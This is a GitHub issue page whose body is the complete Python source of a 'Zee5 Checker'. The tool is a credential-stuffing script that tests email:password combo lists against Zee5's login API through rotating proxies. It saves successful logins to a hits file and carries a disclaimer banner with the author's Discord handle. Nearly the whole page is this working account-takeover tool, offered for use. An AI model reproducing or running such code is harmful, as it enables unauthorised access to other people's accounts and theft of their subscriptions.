Skip to content

fix at line 69 #3

Description

@0xbitx

import os
import random
import colorama
from colorama import Fore, init, Style, Back
import ctypes
ctypes.windll.kernel32.SetConsoleTitleW('Zee5 Checker by thelinuxuser-choice | Http proxy mod')
red = Fore.LIGHTRED_EX
cyan = Fore.LIGHTCYAN_EX
magenta = Fore.MAGENTA
blue = Fore.LIGHTBLUE_EX
yellow = Fore.YELLOW
dblue = Fore.BLUE
GREEN = Fore.GREEN
white = Fore.WHITE
colorama.init(autoreset=True)
banner = f'{cyan}\n-----------------------------------------------------------------------------------------------\n███████\u2001███████\u2001███████\u2001███████\u2001 ██████\u2001██\u2001 ██\u2001███████\u2001 ██████\u2001██\u2001 ██\u2001███████\u2001██████\u2001 \n\u2001\u2001\u2001███\u2001\u2001██\u2001\u2001\u2001\u2001\u2001\u2001██\u2001\u2001\u2001\u2001\u2001\u2001██\u2001\u2001\u2001\u2001\u2001\u2001 ██\u2001\u2001\u2001\u2001\u2001\u2001██\u2001 ██\u2001██\u2001\u2001\u2001\u2001\u2001\u2001██\u2001\u2001\u2001\u2001\u2001\u2001██\u2001 ██\u2001\u2001██\u2001\u2001\u2001\u2001\u2001\u2001██\u2001\u2001\u2001██\u2001\n ███\u2001\u2001 █████\u2001 █████\u2001 ███████\u2001 ██\u2001 ███████\u2001█████\u2001 ██\u2001 █████\u2001\u2001 █████\u2001 ██████\u2001\u2001\n ███\u2001\u2001 ██\u2001\u2001\u2001\u2001 ██\u2001\u2001\u2001\u2001 \u2001\u2001\u2001\u2001\u2001██\u2001 ██\u2001 ██\u2001\u2001\u2001██\u2001██\u2001\u2001\u2001\u2001 ██\u2001 ██\u2001\u2001██\u2001 ██\u2001\u2001\u2001\u2001 ██\u2001\u2001\u2001██\u2001\n███████\u2001███████\u2001███████\u2001███████\u2001 \u2001██████\u2001██\u2001 ██\u2001███████\u2001\u2001██████\u2001██\u2001 ██\u2001███████\u2001██\u2001 ██\u2001\n-----------------------------------------------------------------------------------------------\u2001\u2001\u2001\u2001\u2001\n\u2001{red}\u2001>> Message - I am not responsible for using this in illeagal activities <<\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001 \u2001\u2001\u2001\u2001\u2001\u2001\n {GREEN} >> by linuxuser-choice (Zypher) - github [https://github.com/thelinuxuser-choice] <<\n {yellow} >>discord - Zypher#8062 <<\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001\u2001 \u2001\u2001\u2001\n {blue} >> zee5 checker proxy mod - http only << \n {magenta} >> note - use good proxies always otherwise checker will hop it << \n{cyan}-----------------------------------------------------------------------------------------------\n{red} >>>>>>>>>>Note - Donot load big combos [just load like 1k ]<<<<<<<<<< \n'
print(banner)
file = input('[?] Enter Combo File Name : ')
pfile = input('[?] Enter Proxy File Name [http only / format = ip:port] : ')
combo = open(file, 'r').read().splitlines()
hits = 0
bad = 0
registerd = 0
input('\n[#] Press to start\n')
for accounts in combo:
accounts = accounts.split(':')
email = accounts[0]
password = accounts[1]
with open(pfile) as f:
lines = f.readlines()
prxy = random.choice(lines)
import requests
proxies = {'http': f'http://{prxy}'}
url = f'https://userapi.zee5.com/v1/user/loginemail?email={email}&password={password}'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36', 'Pragma': 'no-cache', 'Accept': '/'}
try:
r2 = requests.get('http://httpbin.org/ip', proxies=proxies, timeout=5)
if 'Access Denied' in r2:
print(f'\n{red}[$] BAD PROXY - SKIPPING\n [!]USED PROXY - {prxy}')
r2.raise_for_status()
except requests.exceptions.RequestException as err:
print(f'\n{red}[!]USED PROXY - {prxy} OOps: Something Else', err)
except requests.exceptions.HTTPError as errh:
print(f'\n{red}[!]USED PROXY - {prxy} Http Error:', errh)
except requests.exceptions.ConnectionError as errc:
print(f'\n{red}[!]USED PROXY - {prxy} Error Connecting:', errc)
except requests.exceptions.Timeout as errt:
print(f'\n{red}[!]USED PROXY - {prxy} Timeout Error:', errt)
r1 = requests.get(url, headers=headers, proxies=proxies, timeout=5).text
print(f'\n{blue}[-] Used proxy - {prxy}')
print(f'\n{yellow}[+] Used account - {email}:{password}')
import ctypes
ctypes.windll.kernel32.SetConsoleTitleW(f'Zee5 Checker by thelinuxuser-choice | Proxy - {prxy} |Hits: {hits} | Bad: {bad} | Registered: {registerd} ')
if 'token' in r1:
hits += 1
print(f'\r{GREEN}[>] Hits: {hits} | Bad: {bad} | Registered: {registerd} ', end='')
with open('ZEE5_HITS.txt', 'a+') as x:
x.write(f'{email}:{password} | @Zypher#8062 discord\n')
elif 'The email address and password combination was wrong during login.' in r1:
bad += 1
print(f'\r{GREEN}[>] Hits: {hits} | Bad: {bad} | Registered: {registerd} ', end='')
elif 'This Email ID has been registered' in r1:
registerd += 1
print(f'\r{GREEN}[>] Hits: {hits} | Bad: {bad} | Registered: {registerd} ', end='')
with open('ZEE5_REGISTARED.txt', 'a+') as x:
x.write(f'{email}:{password} | @Zypher#8062 discord\n')
else:
print(r1)
input('\n\n[#]Press to exit the script')

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions